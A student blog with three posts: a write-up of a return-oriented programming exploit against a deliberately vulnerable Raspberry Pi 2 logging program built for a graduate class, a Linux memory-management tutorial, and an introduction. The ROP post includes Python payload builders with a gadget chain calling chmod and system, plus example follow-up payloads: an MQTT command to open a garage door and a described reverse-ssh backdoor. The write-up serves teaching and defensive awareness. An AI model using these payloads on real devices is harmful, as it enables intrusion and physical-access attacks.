A Bit of Hacking

ROP-ing the Pi – A demo on hacking into embedded systems

Recently, one of our graduate-level classes had a project where we were tasked with coming up with a Return-Oriented Programming (ROP) attack for CPU architectures popular in embedded devices. Given the hardware I had on hand, I chose to attack the Raspberry Pi 2, which uses the 32-bit ARMv7 architecture. It was an interesting experiment which highlights the importance of scrubbing inputs and performing bounds checks in our programs – especially in-house applications tailor-made to perform very specific tasks.

There are already a multitude of defenses against ROP attacks on modern systems. For instance, the Linux kernel has long provided Address Space Layout Randomization (ASLR), and GCC usually has its stack-protector flag on by default.

While these security measures do make such attacks more difficult, they often incur an operational overhead that many embedded systems, operating on tight performance, price, and power margins, cannot afford, and so they are left disabled.

Background on Buffer Overflows

In the realm of security, small vulnerabilities very often provide footholds for larger, more dangerous exploits. One such vulnerability is more common than you would think: the buffer overflow. Return-oriented programming attacks become possible when there is some way to gain control of the Program Counter and redirect the execution flow of the program, and buffer overflows provide exactly that.

In a typical C program running on 32-bit ARM, when a function calls another function, the link register and frame pointer of the previous stack frame are saved onto the stack before making way for the automatic variables of the new frame. An example of a stack frame is shown below:

A buffer overflow happens when the Old Link Register slot, highlighted in red, is overwritten. Upon returning from the function, the old link register is popped from the stack into the Program Counter (PC), and the processor continues executing the instructions at that address. The key is to overwrite that stack slot with an address of our choosing, redirecting the control flow of the program. The most common opening is an array declared as a local variable in the function: if bounds are not properly checked, functions such as strcpy, read, and recv can write more bytes than were allocated on the stack, overflowing the buffer and letting the attacker reach the Old Link Register slot.
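To make the mechanics concrete, here is a minimal Python sketch of how such an overflowing input would be laid out. The buffer size, filler values, and target address are all made up for illustration; on a real target they come from inspecting the binary:

```python
import struct

# Hypothetical layout: a 64-byte local buffer, then the saved frame
# pointer (R11), then the saved link register. All offsets and the
# target address are illustrative, not from a real binary.
BUF_SIZE = 64
SAVED_FP = b"AAAA"                      # filler landing in the saved R11 slot
NEW_LR = struct.pack("<I", 0x00010400)  # address we want popped into the PC
                                        # (32-bit ARM is little-endian here)

payload = b"A" * BUF_SIZE + SAVED_FP + NEW_LR
# Feeding `payload` to the vulnerable read would leave 0x00010400 in the
# Old Link Register slot, so the function "returns" wherever we chose.
```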

ROP Background

Before we get to our exploit, let's touch briefly on the general idea of ROP. Once we have control over the program counter through the buffer overflow, what do we do? Before Data Execution Prevention (DEP), hackers would often inject shellcode (essentially machine code instructions) into the stack via the same overflow we just exploited and have the PC jump back into the stack with the help of a NOP slide. This is no longer possible thanks to DEP. I didn't add it to the list of ignored security features above because DEP has a fairly light overhead. In essence, the stack Virtual Memory Area (VMA, which we discussed in the previous blog post) is marked as readable and writable, but not executable.

If you're on a Linux system you can see this for yourself. Print the VMA mapping of the current process with cat /proc/self/maps and look at the VMA marked [stack]. You will see its access flags set to rw-p. A funny thing to note is that Raspbian has DEP disabled by default for some reason… but we're not going to take the easy way out and send a shell script, as that would be trivial compared to ROP, and where would the fun be in that!?

7ffd8760f000-7ffd87630000 rw-p 00000000 00:00 0                          [stack]

To get around DEP, we jump to snippets of machine instructions in the existing .text sections of the application itself and the libraries it has loaded. We call these snippets gadgets. The key here is that we are not strictly bound by normal program execution flow: we can jump from gadget to gadget to perform a myriad of instructions.

Target System

Alright! Enough background, let’s get to the fun stuff – the target system and the attacker!

Our setup for the victim is shown below. We assume the system is a temperature sensor connected to a Raspberry Pi 2. The computer in the middle is our intruder, which will send the overflowing payload. The RPI2 acts as a connection to a server and may perform analysis on the data before sending updates to the server. Every hour, the temperature sensor module sends data over the UART bus to the RPI2 in the form of a data log. The RPI2 saves the data into a temporary log file until the communication is complete, then swaps the temporary file with the log file.

The pseudocode of the application on the Raspberry Pi2 might look like the following:

for (;;) {
    if (log.txt doesn't exist)
        Create log.txt and block at read
        When data arrives, get header
        Read N bytes into buffer using header's information
        Close(log.txt)
    else if (log.txt exists)
        Create temp.txt and block at read
        When data arrives, get header
        Read N bytes into buffer using header's information
        Replace log.txt with temp.txt
}

The header is shown here:

This is a reasonable setup to emulate embedded systems out in the field. In my years working as an embedded software engineer, I have seen similar application-level communication protocols used to send other types of data. Not necessarily over UART, but the implications are the same: we can control the number of bytes being read in as the payload if we craft a malicious header and bounds checking is not enforced.
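A small Python sketch of the receiver's logic makes the hole obvious. The header layout here (a 4-byte magic plus a 4-byte little-endian length) is invented for illustration, not the actual protocol from the figure:

```python
import struct

# Hypothetical 8-byte header: 4-byte magic, then a 4-byte little-endian
# payload length. The real header layout is in the article's figure.
HEADER_FMT = "<4sI"
BUF_SIZE = 128  # what the receiver actually allocated for the payload

def parse_header(raw):
    magic, length = struct.unpack(HEADER_FMT, raw)
    return magic, length

# A malicious sender claims far more bytes than the receiver's buffer holds.
magic, length = parse_header(struct.pack(HEADER_FMT, b"TLOG", 4096))

# In the C receiver, read(fd, buf, length) with length > BUF_SIZE is
# exactly the overflow: nothing here checks length against BUF_SIZE.
overflow = length > BUF_SIZE
```

The fix, of course, is a single comparison of the claimed length against the buffer capacity before the read.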

The Attack

The attacker will run a C program that sends the log file payload over to the victim RPI2. In order to find the amount of padding required to overflow up to the old Link Register's location, we first send an experimental payload of varying characters and run GDB on the RPI2.

We note how far we are at this point from where R11 points (refer back to the stack diagram) and add or remove padding until we reach the stack slot right before the target slot. There is a more scientific method of performing this task: using the pattern generator provided by the Metasploit framework and finding the offset into the unique pattern. It was not necessary here since we had access to the RPI2 and could view the state of the stack at the time of the overflow. I find the best way to test this quickly is to use Python to create the payload file:
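A minimal sketch of such a script, with a placeholder padding length to tune while watching the stack in GDB:

```python
# Build the experimental payload: a run of recognizable filler followed
# by a marker that should land in the saved LR slot. padding_len is a
# placeholder; adjust it until GDB shows "BBBB" in the right place.
padding_len = 100
payload = b"A" * padding_len + b"BBBB"  # "BBBB" = 0x42424242, easy to spot

with open("payload.bin", "wb") as f:
    f.write(payload)
```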

Now that we have the padding required to overflow up to the old Link Register's slot, we need a list of gadgets to add to our ROP payload. There are many ways to find gadgets: radare2, objdump, or ROPgadget. We used ROPgadget to dump a list of gadgets from the program binary. Here are some of them:

Notice that all gadgets end with an instruction that changes the execution flow, be it a blx to r3, a bx to r3, or a pop into pc. This is what allows us to chain multiple gadgets together to perform all sorts of operations. ROP itself is Turing-complete: we can build loops, conditionals, and jumps out of it. However, we do not need many gadgets to perform dangerous operations.

In our case, we simply want to do the following in order:

  • Send a seemingly benign log file over to the Raspberry Pi 2 with no overflows. This will actually contain a bash script to echo “Here be dragons”. (It can be modified to contain other, more malicious commands, as we'll see later.) Recall that on completion of the log file transfer, it will be saved as “log.txt”.
  • Send a malicious header+payload to overflow device while it’s writing to “temp.txt”.
  • Malicious payload will call chmod(“log.txt”, 777), followed by system(“log.txt”) to execute the shell script.

On an instruction level, however, we will need to follow the ARM calling convention in order to set up the arguments for these functions. We need the following in order to perform the calls:

  1. Address of chmod function loaded in libc.
  2. Address of system function loaded in libc.
  3. Address of “log.txt” string. This will be in the .rodata section.
  4. Gadget or list of gadgets to load or pop data from our stack payload to r0 and r1, the first two arguments of a function call.

chmod, system, and the “log.txt” string can easily be found with gdb. Remember to break in main AFTER libc has been loaded into memory:

We now have requirements 1, 2, and 3. To fulfill 4, we look into the list of gadgets we found earlier and find gadgets which can help us. We will use these gadgets found in libc:

  1. Number 1 will pop 8 values from the stack into these registers in order.
  2. Number 2 will move r7 into r0, r8 into r1, r9 into r2.
  3. Number 3 will branch to the address in r3.

With these, we are capable of performing as many 3-argument libc calls as we want as long as we have remaining overflowed stack.

Let’s walk through it:

  • The first gadget we jump to is at tag (1). This gadget will pop 8 values from the stack. Thus, we will load our stack with the following:
    1. Address of our first libc call, in this case chmod.
    2. Some value, doesn't matter what it is. We used 0x42414241 (ABAB).
    3. Padding, don't care.
    4. Some value, doesn't matter what it is as long as it's the same as (2). We used 0x42414241 (ABAB).
    5. Address of the “log.txt” string. For us, that string was “/home/pi/pirop/log.txt”.
    6. 0x309. This is 777 in decimal, and will be the second argument.
    7. Padding, don't care.
    8. Address of gadget at (2), mov r0, r7.
  • After the gadget at (1) has executed, it will jump to the gadget at (2) because the address of the gadget at (2) was popped into the PC. It will execute until it reaches the instruction at (3), which will then branch, link, and exchange to the address contained in r3 – our chmod call.
  • Upon returning, the PC will execute the cmp r4, r6 instruction. Since the two were made equal, execution continues past the bne instruction and we are once again back at the gadget at (1). We then loop this sequence once more for the system() libc call. For the remainder of the discussion, we will give these gadgets names: the gadget at tag (1) will be called POP_8 because it pops 8 values from the stack, and the gadget at tag (2) will be called MOV_R7_R0 after the first instruction in its sequence.

With this in mind, this is how our overflowed stack will look:

Putting it all together

We complete our ROP payload python file following the stack layout detailed earlier:
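A minimal sketch of what that payload script could look like. Every address below is a placeholder (the real values came from GDB and ROPgadget on the target binary and its libc), and the padding length is the one found experimentally:

```python
import struct

p32 = lambda x: struct.pack("<I", x)  # pack a 32-bit little-endian word

# Placeholder values -- substitute the real ones from GDB/ROPgadget.
PADDING   = b"A" * 100        # distance to the saved LR slot (found earlier)
POP_8     = 0xb6f00000        # gadget (1): pops 8 values from the stack
MOV_R7_R0 = 0xb6f00100        # gadget (2): mov r0, r7; ...; blx r3
CHMOD     = 0xb6e80000        # &chmod in libc
SYSTEM    = 0xb6e80200        # &system in libc
LOG_TXT   = 0x00011000        # &"/home/pi/pirop/log.txt" in .rodata
ABAB      = 0x42414241        # equal values so the cmp r4, r6 check passes
JUNK      = 0x41414141        # don't-care slots

def pop8_round(func, arg0, arg1):
    """The 8 stack values one POP_8 iteration consumes, in the order
    listed in the walkthrough: call address, ABAB, padding, ABAB,
    first argument, second argument, padding, MOV_R7_R0 gadget."""
    return b"".join(p32(v) for v in
                    (func, ABAB, JUNK, ABAB, arg0, arg1, JUNK, MOV_R7_R0))

chain  = PADDING + p32(POP_8)                 # overwrite saved LR with POP_8
chain += pop8_round(CHMOD, LOG_TXT, 0x309)    # chmod("...log.txt", 777 decimal)
chain += pop8_round(SYSTEM, LOG_TXT, 0)       # system("...log.txt")

with open("exploit.bin", "wb") as f:
    f.write(chain)
```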

Start up the program on the Pi, send the shell script with a good header from the computer, then send the exploit payload, and watch as the magic happens:

As seen in the screenshot above, log.txt is now readable, writable, and executable. It contained the script to echo “Here be dragons!”. This, of course, is benign, but dangerous shell script payloads include:

mosquitto_pub -h iot.eclipse.org -t home/garage_door -m "OPEN"   

Or a payload to add the public keys of a server and the attacker and have the Pi reverse-ssh to that server, providing the attacker with remote password-less ssh access to the system.

I hope you found this an interesting read. Moral of the story – do bounds checking!

Linux Memory Management – Part 1

What a strange thing to start off with! This semester I’m taking Advanced Linux Kernel Programming, a graduate level course at Virginia Tech.

Memory in the kernel (whether it be virtual memory, physical memory, the slab layer, software caches, or hardware caches) was one of the core takeaways of the course. Being as important and all-encompassing as it is, the concepts themselves are often explained in isolation, and indeed, the implementation details span many chapters in reference books. What takes some reading, experimenting, and understanding is the glue that binds these concepts together. I'm by no means an expert on the matter. However, this might actually work to our advantage, as we won't be assuming too much. I hope to provide my take on that glue here, along with the tidbits of knowledge our professor gave us throughout the course.

First things first: we will be talking about the volatile memory in a system, commonly known as RAM. It is byte-addressable, which differs from other non-volatile storage (more on that in another post).

Virtual Memory

So, virtual memory – it gives the illusion of the system having more physical memory than it actually does. Here's a diagram of that from Wikipedia:

Here are some things to always, always keep in mind as we proceed with our discussion of physical and virtual memory. The virtual memory footprint can be much larger than that of available physical RAM. Why? Virtual Memory is a way of “Reserving” RAM, creating a contract saying “Yes, this is the memory I need, I don’t care if it’s actually allocated right now, as long as I have it when I need it”. Thus, the kernel’s memory management system is free to lazily allocate physical memory to a given process only when it needs it. This is called demand paging. This setup essentially allows us to have much more Virtual Memory than there is Physical Memory. It also allows us to give multiple different processes the illusion that they have their own memory addresses starting at x and ending at y, while in reality, they are mapped to different physical memory locations.
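The reserve-now, allocate-on-first-touch contract can be sketched with a toy model (this is an illustration of the concept, not kernel code; all names are made up):

```python
# A toy model of demand paging: reserving virtual pages is pure
# bookkeeping; "physical" frames appear only when a page is first touched.
PAGE_SIZE = 4096

class LazyAddressSpace:
    def __init__(self):
        self.reserved = set()  # virtual page numbers promised to the process
        self.frames = {}       # vpn -> lazily allocated "physical" frame

    def reserve(self, vpn, count):
        # The contract: "this is the memory I need" -- nothing is touched yet.
        for n in range(vpn, vpn + count):
            self.reserved.add(n)

    def access(self, vaddr):
        vpn = vaddr // PAGE_SIZE
        if vpn not in self.reserved:
            raise MemoryError("segfault: access to unreserved page")
        if vpn not in self.frames:          # first touch: the "page fault" path
            self.frames[vpn] = bytearray(PAGE_SIZE)
        return self.frames[vpn]

mm = LazyAddressSpace()
mm.reserve(0, 1024)        # "allocate" 4 MiB of virtual memory...
mm.access(5 * PAGE_SIZE)   # ...but only one frame is actually backed so far
```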

The entire system's virtual memory map looks similar to the diagram below. Note that higher linear addresses belong to the kernel while lower addresses belong to userspace. The “hole” exists because, while most modern processor architectures support 64-bit addresses and do indeed have 64-bit registers, the memory access hardware only implements 48-bit addressing (providing up to 256 tebibytes of virtual memory). This is seen as a manufacturing cost awareness measure, as indexing up to 16 EiB of memory is not needed at this point in time.

While we’re here, let’s just briefly go over the individual sections in kernel space memory shown below. From left to right,

  • dirmap is the direct mapping of ALL physical addresses into the kernel's virtual memory. This is where it's important to keep in mind that virtual memory is an illusion; having that mapping there merely says, “If we access memory at that address, we get the contents of the physical memory through a 1-to-1 mapping”. This is why the user/kernel boundary is guarded so tightly: access to the kernel potentially means access to all currently mapped memory in the system. Device memory is also often accessed through memory-mapped I/O; the ioremap kernel function provides an API to map these devices into usable virtual memory.
  • vmalloc region is the virtual memory region into which calls to vmalloc map physical memory (usually from high memory).
  • virtual mem map is where the array of struct page entries describing every physical page frame resides.
  • kernel text is the .text section of the loaded kernel.
  • modules holds device drivers and other kernel modules loaded on demand.

In Linux, virtual memory is tracked in a per-process structure called the mm, defined by struct mm_struct. You can find the definition here. Check the latest version of the kernel at the time of reading, as the code does change (maybe not the core, but parts will change from version to version). We will go over the specifics of that data structure after touching on the key concept of the Virtual Memory Area (VMA).

The VMA is a logical concept represented by the kernel data structure struct vm_area_struct. A single process has one mm_struct descriptor, and that mm_struct references many VMAs. Within a single process, each VMA maps a non-overlapping, contiguous chunk of virtual memory carrying the same permission flags.

Try it yourself – on a linux system type the command below:

sudo cat /proc/1/maps
This is how it looks on my system:
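Each line of that output is one VMA, and the format is regular enough to pick apart programmatically. Here's a small sketch of a parser for one maps line, fed the [stack] line quoted in the ROP post above (the field layout assumed here is the standard maps format: address range, permissions, offset, device, inode, and optional pathname):

```python
# Parse one line of /proc/<pid>/maps into its VMA fields.
def parse_maps_line(line):
    fields = line.split()
    start, end = (int(x, 16) for x in fields[0].split("-"))
    return {
        "start": start,
        "end": end,
        "perms": fields[1],                          # e.g. rw-p
        "name": fields[5] if len(fields) > 5 else "", # pathname or [stack] etc.
    }

vma = parse_maps_line(
    "7ffd8760f000-7ffd87630000 rw-p 00000000 00:00 0"
    "                          [stack]")
# rw-p: readable, writable, NOT executable, private -- DEP in action.
```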

Now we’re ready to talk about the mm_struct or memory descriptor. Shown below is a minimized version of struct mm_struct, with many members not included for the brevity of this discussion.

struct mm_struct {
	struct {
		struct vm_area_struct *mmap;
		struct rb_root mm_rb;
		unsigned long mmap_base;
		unsigned long task_size;
		unsigned long highest_vm_end;
		pgd_t *pgd;
		int map_count;
		spinlock_t page_table_lock;
		struct rw_semaphore mmap_sem;
		struct list_head mmlist;
		unsigned long total_vm;
	} __randomize_layout;
	unsigned long cpu_bitmap[];
};

mmap and mm_rb are different data-structure linkages over the same VMAs owned by a particular process. mmap is a linked list of VMAs, usually used to traverse or clear them all, and mm_rb is a red-black tree of VMAs used for fast lookups. pgd holds the physical address of the Page Global Directory (PGD); it is also written into the CR3 register so the memory management unit can walk the tables to find our virtual-to-physical address mapping – something we will go over in the next section.

Hardware

None of this would work fast without help from hardware. Like many other things, extra help from hardware is a tried and tested way to increase throughput. Similar to how graphics rendering or highly parallel workloads might be delegated to a GPU or FPGAs, memory operations are delegated to the Memory Management Unit (MMU)!
A physical diagram of what the MMU and its relationship with memory might look like is shown here:

Let's break it down. The SoC (System on Chip) has a memory controller which it uses to interface with physical RAM over a communication bus. This in turn interfaces with the MMU. On the Intel x86_64 architecture, the CR3 register simply holds the address of the Page Global Directory for the currently running process.

One important thing to remember is that the PGD is a per-process structure. We will cover the PGD -> PUD -> PMD -> PTE page frame mapping in the next section. For now, it is enough to know that the MMU takes a virtual address and returns a physical address if a mapping is found. You might be wondering what happens on a context switch, since the PGD is per-process! After all, this is the hardware itself and there is no virtualization at this level. At each context switch, the CR3 register is updated to point to the PGD of the incoming process (represented by a struct task_struct).

The Translation Lookaside Buffer (TLB) is hardware that caches virtual-to-physical address translations. Walking the page tables can be expensive, and while relatively small, the TLB is integral to reducing the time an address translation takes.

The MMU plays these three crucial roles with respect to our discussion:

  • Does a TLB Check to see if the PTE is currently cached.
  • Performs page table walks to find Virtual Address to Physical Address mappings.
  • Traps into the kernel to handle the page fault if neither the page tables nor the TLB contain a PTE for a given virtual address. (Linux in general is really lazy and will grow the virtual address space first, waiting for page faults before mapping in physical memory.)

Paging in Linux

Now that we're aware of how the virtual-to-physical memory relationship is structured in the kernel, and of the hardware's role in it, let's talk about how the kernel and the hardware maintain this accounting: via paging. When learning about paging, one thing that completely threw me off was the fact that it has very little to do with the page cache, a separate Linux concept concerned with how non-volatile storage is managed. The two do interact indirectly through swapping, which we will cover in another part.

Pages, or page frames, are physically contiguous blocks of volatile memory. In Linux, the mappings for a linear address are arranged as a radix tree whose key is the virtual address and whose value is the physical address. Again, each process has its own memory descriptor and thus its own tree. The actual layout of each page table entry (PTE) is architecture-specific, but usually there is a bit denoting whether that physical page is currently in use, to avoid handing out overlapping physical pages:

Each level of the tree is indexed by a field of bits at a fixed offset within the linear virtual address, as seen here:

Since these types are architecture-specific, you can, as expected, find them in architecture-specific directories within the kernel source: x86 is here. For example, pud_t, pmd_t, and pgd_t.
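The index extraction itself is just bit shifting and masking. Here's a sketch for x86_64 4-level paging, where a 48-bit virtual address splits into four 9-bit table indices plus a 12-bit page offset (the bit positions are the standard x86_64 ones; the dictionary names are mine):

```python
# Split a 48-bit x86_64 virtual address into its 4-level paging indices.
# Each table level has 512 entries, hence the 9-bit (0x1FF) masks;
# pages are 4 KiB, hence the 12-bit offset.
def decompose(vaddr):
    return {
        "pgd_index": (vaddr >> 39) & 0x1FF,  # Page Global Directory
        "pud_index": (vaddr >> 30) & 0x1FF,  # Page Upper Directory
        "pmd_index": (vaddr >> 21) & 0x1FF,  # Page Middle Directory
        "pte_index": (vaddr >> 12) & 0x1FF,  # Page Table Entry
        "offset":    vaddr & 0xFFF,          # byte offset within the page
    }

parts = decompose(0x7ffd8760f123)
```

Recombining the five fields (shifted back into place) reproduces the original address, which is a handy sanity check that the masks and shifts tile the 48 bits exactly.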

Connecting These Concepts Together

Finally, a quick note on how these concepts tie together in a basic memory request.


  1. A process attempts to access a memory address in a particular VMA.
  2. The MMU checks its TLB to see if it has that entry cached.
  3. If the entry isn't cached, the processor will do a page-table walk using the pgd stored in its cr3 (on x86) register to find the particular page frame.
  4. The page frame offset is found and the memory is retrieved.

Here's the big question: we know that VMAs are virtual contracts, so the kernel can grow and shrink them at will without actually mapping physical memory! What happens if, in step 4, the page frame is NOT found in physical memory? This is where page faults and demand paging come in. Think about it. We'll cover that in Part 2.

The Beginning

If anyone stumbles upon this blog, welcome. I’m creating this as a way to force myself to write down my understanding of concepts as I learn them, more as a public class notebook. Making it public does two things:
1) The knowledge that people way smarter and more adept might be reading this will force me to do proper research and triple-check my grasp of concepts before posting.
2) If people in search of answers come across it and it helps them, awesome!

The creation of this project has been in my mind for quite a while now, but I never had the motivation and time to go through with it – it was always quite low on the priority list. Now that I’m in grad school, what better way to learn and share knowledge than this! Teaching is always a nice way to reinforce knowledge.

Topics we’ll be discussing here:

  1. Linux Kernel Programming and core linux concepts.
  2. Security and exploits.
  3. Home automation projects.
  4. Any other Computer Engineering related things I happen to learn.